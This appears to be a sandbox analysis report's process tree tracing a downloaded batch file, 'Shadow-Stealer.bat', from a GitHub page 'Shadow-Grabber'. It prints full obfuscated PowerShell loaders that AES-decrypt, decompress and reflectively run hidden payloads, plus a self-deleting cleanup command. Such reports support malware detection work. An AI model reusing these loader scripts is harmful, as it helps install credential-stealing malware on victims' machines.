[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))4⤵
  - Hide Artifacts: Hidden Window
- C:\Windows\SysWOW64\dllhost.exe (tree depth 5)
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{4c331552-2ca5-40d5-823f-ac583a42d04b}
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5684).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = 
$qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))5⤵
- Hide Artifacts: Hidden Window
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{68cf8a46-b33f-4fe2-ba56-6c3aa35b7ce0}5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Excalisz/Shadow-Grabber-2⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb6ecd3cb8,0x7ffb6ecd3cc8,0x7ffb6ecd3cd83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:83⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{f98e93b1-ae13-45dd-baab-43ff5f8a4d5a}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{6e8d0acd-a966-4f47-a7a5-dca899832231}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6132 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
